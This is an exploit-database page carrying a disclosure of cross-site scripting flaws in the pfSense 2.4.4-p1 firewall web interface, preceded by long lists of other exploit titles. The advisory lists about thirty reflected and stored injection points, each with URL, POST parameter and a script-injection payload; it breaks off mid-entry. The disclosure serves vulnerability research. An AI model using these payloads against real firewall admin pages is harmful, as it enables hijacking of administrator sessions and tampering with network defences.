Menu

"pfSense 2.4.4-p1 - Cross-Site Scripting"

Author

"Ozer Goker"

Platform

multiple

Release date

2019-02-04

Release Date Title Type Platform Author
2019-02-11 "Indusoft Web Studio 8.1 SP2 - Remote Code Execution" remote multiple "Jacob Baines"
2019-02-06 "Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows" dos multiple "Google Security Research"
2019-02-04 "pfSense 2.4.4-p1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-04 "Nessus 8.2.1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics" dos multiple "Google Security Research"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 XNU - 'vm_map_copy' Optimization which Requires Atomicity isn't Atomic" dos multiple "Google Security Research"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 - Sandbox Escapes due to Type Confusions and Memory Safety Issues in iohideventsystem" dos multiple "Google Security Research"
2019-01-31 "macOS < 10.14.3 / iOS < 12.1.3 - Arbitrary mach Port Name Deallocation in XPC Services due to Invalid mach Message Parsing in _xpc_serializer_unpack" dos multiple "Google Security Research"
2019-01-30 "iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure" dos multiple "Google Security Research"
2019-01-28 "LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference" webapps multiple 0v3rride
2019-01-25 "iOS/macOS - 'task_swap_mach_voucher()' Use-After-Free" dos multiple "Google Security Research"
2019-01-25 "Lua 5.3.5 - 'debug.upvaluejoin' Use After Free" dos multiple "Fady Mohammed Osman"
2019-01-17 "Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting" webapps multiple "Mohamed M.Fouad"
2019-01-18 "SCP Client - Multiple Vulnerabilities (SSHtranger Things)" remote multiple "Mark E. Haase"
2019-01-16 "WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free" dos multiple "Google Security Research"
2019-01-16 "Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory in Invalid Array Length" dos multiple "Bogdan Kurinnoy"
2019-01-10 "OpenSource ERP 6.3.1. - SQL Injection" webapps multiple "Emre ÖVÜNÇ"
2017-03-02 "MDwiki < 0.6.2 - Cross-Site Scripting" webapps multiple evi1m0
2019-01-09 "Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory. Denial of Service (PoC)" dos multiple "Bogdan Kurinnoy"
2019-01-08 "Wireshark - 'get_t61_string' Heap Out-of-Bounds Read" dos multiple "Google Security Research"
2019-01-02 "WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write" dos multiple "Google Security Research"
2019-01-02 "WebKit JSC - 'AbstractValue::set' Use-After-Free" dos multiple "Google Security Research"
2018-12-10 "Kubernetes - (Authenticated) Arbitrary Requests" remote multiple evict
2018-12-10 "Kubernetes - (Unauthenticated) Arbitrary Requests" remote multiple evict
2018-12-21 "Netatalk - Bypass Authentication" remote multiple "Tenable NS"
2018-12-21 "Netatalk < 3.1.12 - Authentication Bypass" remote multiple "Jacob Baines"
2018-12-20 "Erlang - Port Mapper Daemon Cookie RCE (Metasploit)" remote multiple Metasploit
2018-12-15 "Google Chrome 70 - SQLite Magellan Crash (PoC)" dos multiple zhuowei
2018-12-19 "IBM Operational Decision Manager 8.x - XML External Entity Injection" webapps multiple "Mohamed M.Fouad"
2018-12-14 "Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)" webapps multiple alt3kx
2018-12-14 "Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure" webapps multiple alt3kx
2018-12-13 "WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains" dos multiple "Google Security Research"
2018-12-11 "Adobe ColdFusion 2018 - Arbitrary File Upload" webapps multiple "Vahagn Vardanyan"
2018-12-11 "Apache OFBiz 16.11.05 - Cross-Site Scripting" webapps multiple DKM
2018-12-11 "PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion" webapps multiple bzyo
2018-12-11 "XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection" local multiple "Google Security Research"
2018-12-04 "Wireshark - 'find_signature' Heap Out-of-Bounds Read" dos multiple "Google Security Research"
2018-12-04 "Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption" dos multiple "Google Security Research"
2018-11-29 "TeamCity Agent - XML-RPC Command Execution (Metasploit)" remote multiple Metasploit
2018-11-29 "WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Does not Invalidate the 'ForInContext' Object" dos multiple "Google Security Research"
2018-11-29 "WebKit JIT - 'ByteCodeParser::handleIntrinsicCall' Type Confusion" dos multiple "Google Security Research"
2018-11-29 "WebKit JSC JIT - 'JSPropertyNameEnumerator' Type Confusion" dos multiple "Google Security Research"
2018-11-26 "Xorg X11 Server - SUID privilege escalation (Metasploit)" local multiple Metasploit
2018-11-19 "ImageMagick - Memory Leak" local multiple barracud4_
2017-10-03 "Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting" local multiple "Anton Lopanitsyn"
2017-10-03 "Webkit (Safari) - Universal Cross-site Scripting" local multiple "Anton Lopanitsyn"
2014-11-21 "FluxBB < 1.5.6 - SQL Injection" webapps multiple secthrowaway
2018-08-13 "IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting" webapps multiple "Vikas Khanna"
2018-07-18 "Open-AudIT Community 2.1.1 - Cross-Site Scripting" webapps multiple "Ranjeet Jaiswal"
2018-07-11 "Dicoogle PACS 2.5.0 - Directory Traversal" webapps multiple "Carlos Avila"
2018-07-07 "Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution" webapps multiple bobsecq
2018-07-04 "Gitea 1.4.0 - Remote Code Execution" webapps multiple "Kacper Szurek"
2018-06-20 "IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)" webapps multiple Nettitude
2018-05-25 "Oracle WebCenter Sites 11.1.1.8.0/12.2.1.x - Cross-Site Scripting" webapps multiple "Richard Alviarez"
2018-05-25 "SAP Internet Transaction Server 6200.x - Session Fixation / Cross-Site Scripting" webapps multiple "J. Carrillo Lencina"
2018-05-03 "JasperReports - (Authenticated) File Read" webapps multiple "Hector Monsegur"
2014-01-14 "Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection" webapps multiple "Takeshi Terada"
2018-04-18 "Kodi 17.6 - Persistent Cross-Site Scripting" webapps multiple "Manuel García Cárdenas"
2018-04-05 "WebRTC - Private IP Leakage (Metasploit)" webapps multiple "Dhiraj Mishra"
2018-03-30 "Open-AuditIT Professional 2.1 - Cross-Site Request Forgery" webapps multiple "Nilesh Sapariya"
2018-03-28 "TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting" webapps multiple "Sven Fassbender"
2018-03-28 "TwonkyMedia Server 7.0.11-8.5 - Directory Traversal" webapps multiple "Sven Fassbender"
2018-03-20 "Cisco node-jos < 0.11.0 - Re-sign Tokens" webapps multiple zioBlack
2018-03-06 "Bravo Tejari Web Portal - Cross-Site Request Forgery" webapps multiple "Arvind V"
2018-03-02 "antMan < 0.9.1a - Authentication Bypass" webapps multiple "Joshua Bowser"
2018-03-12 "Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials" webapps multiple LiquidWorm
2017-12-01 "MistServer 2.12 - Cross-Site Scripting" webapps multiple hyp3rlinx
2017-11-15 "CommuniGatePro 6.1.16 - Cross-Site Scripting" webapps multiple "Boumediene KADDOUR"
2017-11-03 "Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting" webapps multiple "Dewank Pant"
2017-11-03 "Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting" webapps multiple "Dewank Pant"
2017-10-14 "Logitech Media Server - Cross-Site Scripting" webapps multiple "Thiago Sena"
2017-10-17 "OpenText Documentum Content Server - Arbitrary File Download" webapps multiple "Andrey B. Panfilov"
2017-10-17 "OpenText Documentum Content Server - 'dmr_content' Privilege Escalation" webapps multiple "Andrey B. Panfilov"
2017-10-17 "OpenText Documentum Content Server - Arbitrary File Download Privilege Escalation" webapps multiple "Andrey B. Panfilov"
2017-10-17 "OpenText Documentum Content Server - Privilege Escalation" webapps multiple "Andrey B. Panfilov"
2017-02-22 "Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation" webapps multiple forsec
2017-08-09 "Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery" webapps multiple "Dhiraj Mishra"
2017-09-04 "CodeMeter 6.50 - Cross-Site Scripting" webapps multiple Vulnerability-Lab
2017-07-25 "WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-07-18 "PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting" webapps multiple "Daniel Correa"
2017-07-07 "Apache Struts 2.3.x Showcase - Remote Code Execution" webapps multiple "Vex Woo"
2017-06-01 "WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-06-01 "WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-06-01 "WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation" webapps multiple "Google Security Research"
2017-05-25 "WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-25 "Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-04-30 "Emby MediaServer 3.2.5 - Directory Traversal" webapps multiple LiquidWorm
2017-04-30 "Emby MediaServer 3.2.5 - Password Reset" webapps multiple LiquidWorm
2017-04-30 "Emby MediaServer 3.2.5 - SQL Injection" webapps multiple LiquidWorm
2017-04-25 "OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution" webapps multiple "Andrey B. Panfilov"
2017-04-25 "HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion" webapps multiple "Paolo Stagno"
2017-04-20 "Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-04-13 "agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting" webapps multiple "SySS GmbH"
2017-04-13 "agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery" webapps multiple "SySS GmbH"
2016-01-11 "SedSystems D3 Decimator - Multiple Vulnerabilities" webapps multiple prdelka
2017-04-11 "Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element" webapps multiple "Google Security Research"
2017-04-11 "Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-05-30 "KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution" webapps multiple SecuriTeam
2017-03-31 "Splunk Enterprise - Information Disclosure" webapps multiple hyp3rlinx
2017-04-20 "Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2016-05-04 "WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - File Upload (Metasploit)" webapps multiple Metasploit
2015-06-03 "SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)" webapps multiple Metasploit
2016-12-26 "PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)" webapps multiple Metasploit
2015-01-05 "OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)" webapps multiple Metasploit
2015-01-25 "OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)" webapps multiple Metasploit
2014-11-18 "Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit) (1)" webapps multiple Metasploit
2018-02-16 "Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting" webapps multiple "Marios Nicolaides"
2017-03-17 "Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution" webapps multiple SecuriTeam
2018-02-02 "Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal" webapps multiple "Dmitry Chastuhin"
2018-01-28 "Nexpose < 6.4.66 - Cross-Site Request Forgery" webapps multiple "Shwetabh Vishnoi"
2018-01-10 "SAP NetWeaver J2EE Engine 7.40 - SQL Injection" webapps multiple "Vahagn Vardanyan"
2003-06-16 "Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-06-06 "Max Web Portal < 1.30 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-06-04 "MegaBrowser < 0.71b - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-06-03 "FTP Service < 1.2 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-06-02 "WinMX < 2.6 - Design Error" webapps multiple "GulfTech Security"
2003-05-30 "P-Synch < 6.2.5 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2018-01-15 "DarkComet (C2 Server) - File Upload" webapps multiple "Pseudo Laboratories"
2003-01-17 "phpLinks < 2.1.2 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2003-01-13 "PHP Topsites < 2.2 - Multiple Vulnerabilities" webapps multiple "GulfTech Security"
2018-01-03 "EMC xPression 4.5SP1 Patch 13 - 'model.jobHistoryId' SQL Injection" webapps multiple "Pawel Gocyla"
2017-12-27 "SAP BusinessObjects launch pad - Server-Side Request Forgery" webapps multiple "Ahmad Mahfouz"
2017-12-20 "Ability Mail Server 3.3.2 - Cross-Site Scripting" webapps multiple "Aloyce J. Makalanga"
2017-12-20 "Conarc iChannel - Improper Access Restrictions" webapps multiple "Information Paradox"
2017-12-13 "vBulletin 5 - 'cacheTemplates' Remote Arbitrary File Deletion" webapps multiple SecuriTeam
2017-12-13 "vBulletin 5 - 'routestring' Remote Code Execution" webapps multiple SecuriTeam
2017-03-15 "GitHub Enterprise < 2.8.7 - Remote Code Execution" webapps multiple orange
2017-03-08 "Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps multiple "SEC Consult"
2017-01-15 "Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)" webapps multiple "Mehmet Ince"
2017-02-24 "Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting" webapps multiple "Google Security Research"
2017-02-24 "Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass" webapps multiple "Google Security Research"
2016-12-23 "Apache mod_session_crypto - Padding Oracle" webapps multiple "RedTeam Pentesting GmbH"
2016-08-04 "ntop-ng 2.5.160805 - Username Enumeration" webapps multiple "Dolev Farhi"
2016-12-09 "Splunk Enterprise 6.4.3 - Server-Side Request Forgery" webapps multiple Security-Assessment.com
2014-11-09 "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2014-12-03 "ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download" webapps multiple "Pedro Ribeiro"
2015-02-09 "ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2014-11-05 "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)" webapps multiple "Pedro Ribeiro"
2015-01-15 "ManageEngine Desktop Central - Create Administrator" webapps multiple "Pedro Ribeiro"
2018-01-23 "NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation" webapps multiple LiquidWorm
2016-05-17 "Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)" webapps multiple "Karn Ganeshen"
2016-04-27 "EMC ViPR SRM - Cross-Site Request Forgery" webapps multiple "Han Sahin"
2016-03-23 "MiCollab 7.0 - SQL Injection" webapps multiple "Goran Tuzovic"
2016-03-28 "Liferay Portal 5.1.2 - Persistent Cross-Site Scripting" webapps multiple "Sarim Kiani"
2016-02-17 "JMX2 Email Tester - 'save_email.php' Arbitrary File Upload" webapps multiple HaHwul
2016-02-16 "ManageEngine Network Configuration Management Build 11000 - Privilege Escalation" webapps multiple "Kaustubh G. Padwad"
2016-02-16 "ManageEngine OPutils 8.0 - Multiple Vulnerabilities" webapps multiple "Kaustubh G. Padwad"
2016-02-10 "Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure" webapps multiple Vulnerability-Lab
2016-02-08 "dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery" webapps multiple hyp3rlinx
2016-02-02 "Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery" webapps multiple "Kaustubh G. Padwad"
2016-02-01 "ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation" webapps multiple GraphX
2016-01-28 "SAP HANA 1.00.095 - hdbindexserver Memory Corruption" webapps multiple ERPScan
2015-08-27 "Oracle GlassFish Server 4.1 - Directory Traversal" webapps multiple "Trustwave's SpiderLabs"
2014-08-20 "ManageEngine Password Manager Pro / ManageEngine IT360 - SQL Injection" webapps multiple "Pedro Ribeiro"
2016-01-14 "Manage Engine Application Manager 12.5 - Arbitrary Command Execution" webapps multiple "Bikramaditya Guha"
2016-01-14 "Manage Engine Applications Manager 12 - Multiple Vulnerabilities" webapps multiple "Bikramaditya Guha"
2015-12-01 "ntop-ng 2.0.151021 - Privilege Escalation" webapps multiple "Dolev Farhi"
2015-11-16 "VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting" webapps multiple "Andrea Sindoni"
2015-11-05 "JSSE - SKIP-TLS" webapps multiple "Ramon de C Valle"
2015-11-05 "OpenSSL - Alternative Chains Certificate Forgery" webapps multiple "Ramon de C Valle"
2013-04-13 "Aibolit - Information Disclosure" webapps multiple MustLive
2015-10-08 "Kallithea 0.2.9 - 'came_from' HTTP Response Splitting" webapps multiple LiquidWorm
2013-02-06 "Verax NMS - Multiple Method Authentication Bypass" webapps multiple "Andrew Brooks"
2015-09-14 "ManageEngine OpManager 11.5 - Multiple Vulnerabilities" webapps multiple xistence
2015-09-14 "ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution" webapps multiple xistence
2012-11-26 "Forescout CounterACT - 'a' Open Redirection" webapps multiple "Joseph Sheridan"
2012-11-09 "ESRI ArcGIS for Server - 'where' SQL Injection" webapps multiple anonymous
2012-09-12 "Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting" webapps multiple "D. Niedermaier"
2015-08-13 "Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities" webapps multiple "Martino Sani"
2015-08-13 "Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection" webapps multiple "Dawid Golunski"
2015-08-12 "Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity" webapps multiple "David Bloom"
2015-07-27 "Hawkeye-G 3.0.1.4912 - Persistent Cross-Site Scripting / Information Leakage" webapps multiple hyp3rlinx
2015-07-24 "Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery" webapps multiple hyp3rlinx
2015-07-20 "AirDroid iOS / Android / Win 3.1.3 - Persistent" webapps multiple Vulnerability-Lab
2012-08-06 "Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities" webapps multiple "Benjamin Kunz Mejri"
2012-07-30 "Zenoss 3.2.1 - Multiple Vulnerabilities" webapps multiple "Brendan Coles"
2012-07-30 "Zenoss 3.2.1 - (Authenticated) Remote Command Execution" webapps multiple "Brendan Coles"
2012-08-03 "ntop - 'arbfile' Cross-Site Scripting" webapps multiple "Marcos Garcia"
2012-06-29 "SWFupload - 'movieName' Cross-Site Scripting" webapps multiple "Nathan Partlan"
2015-06-26 "Thycotic Secret Server 8.8.000004 - Persistent Cross-Site Scripting" webapps multiple "Marco Delai"
2015-08-18 "Cisco Unified Communications Manager - Multiple Vulnerabilities" webapps multiple "Bernhard Mueller"
2015-06-19 "Lively Cart - SQL Injection" webapps multiple "Manish Tanwar"
2015-06-19 "ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities" webapps multiple Vulnerability-Lab
2015-06-12 "Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities" webapps multiple "Dolev Farhi"
2015-05-18 "OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities" webapps multiple Vulnerability-Lab
2015-05-07 "WordPress Plugin Freshmail 1.5.8 - SQL Injection" webapps multiple "Felipe Molina"
2015-04-02 "Kemp Load Master 7.1.16 - Multiple Vulnerabilities" webapps multiple "Roberto Suggi Liverani"
2015-03-31 "JBoss AS 3/4/5/6 - Remote Command Execution" webapps multiple "João Filho Matos Figueiredo"
2015-03-17 "Metasploit Project < 4.11.1 - Initial User Creation Cross-Site Request Forgery (Metasploit)" webapps multiple "Mohamed Abdelbaset Elnoby"
2015-02-19 "CrushFTP 7.2.0 - Multiple Vulnerabilities" webapps multiple "Rehan Ahmed"
2011-07-12 "Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting" webapps multiple "Szymon Gruszecki"
2015-01-26 "Symantec Data Center Security - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2015-01-26 "jclassifiedsmanager - Multiple Vulnerabilities" webapps multiple "Sarath Nair"
Release Date Title Type Platform Author
2019-02-12 "OPNsense < 19.1.1 - Cross-Site Scripting" webapps php "Ozer Goker"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-04 "pfSense 2.4.4-p1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-02-04 "Nessus 8.2.1 - Cross-Site Scripting" webapps multiple "Ozer Goker"
2019-01-07 "phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Ozer Goker"
2017-01-13 "Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution" webapps linux "Ozer Goker"
2016-04-21 "phpLiteAdmin 1.9.6 - Multiple Vulnerabilities" webapps php "Ozer Goker"
2016-04-14 "PHPmongoDB 1.0.0 - Multiple Vulnerabilities" webapps php "Ozer Goker"
2016-04-11 "RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities" webapps php "Ozer Goker"

Unfortunately we've not tracked down any possible victims.

Ads

##################################################################################################################################
# Exploit Title: pfSense 2.4.4-p1 | Cross-Site Scripting
# Date: 28.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.pfsense.org
# Software Link: https://frafiles.pfsense.org/mirror/downloads/pfSense-CE-2.4.4-RELEASE-p1-amd64.iso.gz
# Version: 2.4.4-p1
##################################################################################################################################

Introduction
pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.


#################################################################################


XSS details: Reflected & Stored

#################################################################################

XSS1 | Reflected

URL
http://192.168.2.200/system_advanced_admin.php

METHOD
Post

PARAMETER
webguiproto

PAYLOAD
"><script>alert(1)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/interfaces_assign.php

METHOD
Post

PARAMETER
wan

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
dscp

PAYLOAD
"><script>alert(3)</script>

#################################################################################

XSS4 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
tag

PAYLOAD
"><script>alert(4)</script>

#################################################################################

XSS5 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
tagged

PAYLOAD
"><script>alert(5)</script>

#################################################################################

XSS6 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
statetype

PAYLOAD
"><script>alert(6)</script>

#################################################################################

XSS7 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
vlanprio

PAYLOAD
"><script>alert(7)</script>

#################################################################################

XSS8 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
vlanprioset

PAYLOAD
"><script>alert(8)</script>

#################################################################################

XSS9 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
dnpipe

PAYLOAD
"><script>alert(9)</script>

#################################################################################

XSS10 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
defaultqueue

PAYLOAD
"><script>alert(10)</script>

#################################################################################

XSS11 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
dscp

PAYLOAD
"><script>alert(11)</script>

#################################################################################

XSS12 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
tag

PAYLOAD
"><script>alert(12)</script>

#################################################################################

XSS13 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
tagged

PAYLOAD
"><script>alert(13)</script>

#################################################################################

XSS14 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
statetype

PAYLOAD
"><script>alert(14)</script>

#################################################################################

XSS15 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
vlanprio

PAYLOAD
"><script>alert(15)</script>

#################################################################################

XSS16 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
vlanprioset

PAYLOAD
"><script>alert(16)</script>

#################################################################################

XSS17 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
dnpipe

PAYLOAD
"><script>alert(17)</script>

#################################################################################

XSS18 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1

METHOD
Post

PARAMETER
defaultqueue

PAYLOAD
"><script>alert(18)</script>

#################################################################################

XSS19 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
dscp

PAYLOAD
"><script>alert(19)</script>

#################################################################################

XSS20 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
tag

PAYLOAD
"><script>alert(20)</script>

#################################################################################

XSS21 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
tagged

PAYLOAD
"><script>alert(21)</script>

#################################################################################

XSS22 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
statetype

PAYLOAD
"><script>alert(22)</script>

#################################################################################

XSS23 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
vlanprio

PAYLOAD
"><script>alert(23)</script>

#################################################################################

XSS24 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
vlanprioset

PAYLOAD
"><script>alert(24)</script>

#################################################################################

XSS25 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
dnpipe

PAYLOAD
"><script>alert(25)</script>

#################################################################################

XSS26 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
defaultqueue

PAYLOAD
"><script>alert(26)</script>

#################################################################################

XSS27 | Reflected

URL
http://192.168.2.200/firewall_shaper.php

METHOD
Post

PARAMETER
name

PAYLOAD
"><script>alert(27)</script>

#################################################################################

XSS28 | Stored

URL
http://192.168.2.200/services_igmpproxy_edit.php

METHOD
Post

PARAMETER
address0

PAYLOAD
"><script>alert(28)</script>

#################################################################################

XSS29 | Stored

URL
http://192.168.2.200/services_ntpd_gps.php

METHOD
Post

PARAMETER
gpstype

PAYLOAD
"><script>alert(29)</script>

#################################################################################

XSS30 | Reflected

URL
http://192.168.2.200/diag_traceroute.php

METHOD
Post

PARAMETER
